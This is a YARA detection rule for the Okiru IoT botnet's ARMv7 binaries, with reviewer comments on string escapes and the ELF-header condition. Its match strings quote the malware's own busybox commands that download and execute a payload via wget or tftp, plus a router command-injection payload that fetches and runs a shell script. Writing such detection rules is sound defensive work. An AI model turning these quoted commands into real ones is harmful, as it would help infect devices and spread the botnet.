Ruleset to detect the Okiru IoT malware based on the ARMv7 version found.
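rule Okiru : arm7 {
    meta:
        date = "11.12.2017"
        description = "Ruleset to detect the Okiru IoT malware based on the ARMv7 version found."

    strings:
        // Command templates the bot uses when it spreads: stage busybox into a
        // working path, then pull the next-stage "okiru.<arch>" payload by wget or tftp.
        $busy_1 = "/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s"
        $busy_2 = "/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s"
        $busy_3 = "/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s"
        $busy_4 = "/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s"
        // NOTE(review): YARA decodes \x45..\x45 here into the bytes "ECHODONE". If the
        // sample stores the backslash-x text literally (as it would if echo is meant to
        // expand it on the device), this string will not match by itself; the 3-of-N
        // condition below still fires on the other templates. Confirm against the sample.
        $busy_5 = "/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'"
        // $busy_6 is kept disabled: "\c" is not a documented YARA text-string escape, so
        // the line does not compile as written. Re-enable only after rewriting the escape.
        // $busy_6 = "/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'"
        // SOAP-style element whose value is a shell command substitution: the
        // command-injection payload the bot sends to vulnerable routers.
        $xml = "<NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</NewStatusURL>"

    condition:
        // Anchor on the ELF magic (7F 45 4C 46, read little-endian) so the rule only
        // fires on executables and not on any text that merely quotes these commands
        // (analysis reports, captured telnet sessions, or this rule file itself).
        // Drop the header check if the rule is applied to memory dumps.
        uint32(0) == 0x464C457F and
        3 of ($busy_*) and $xml
}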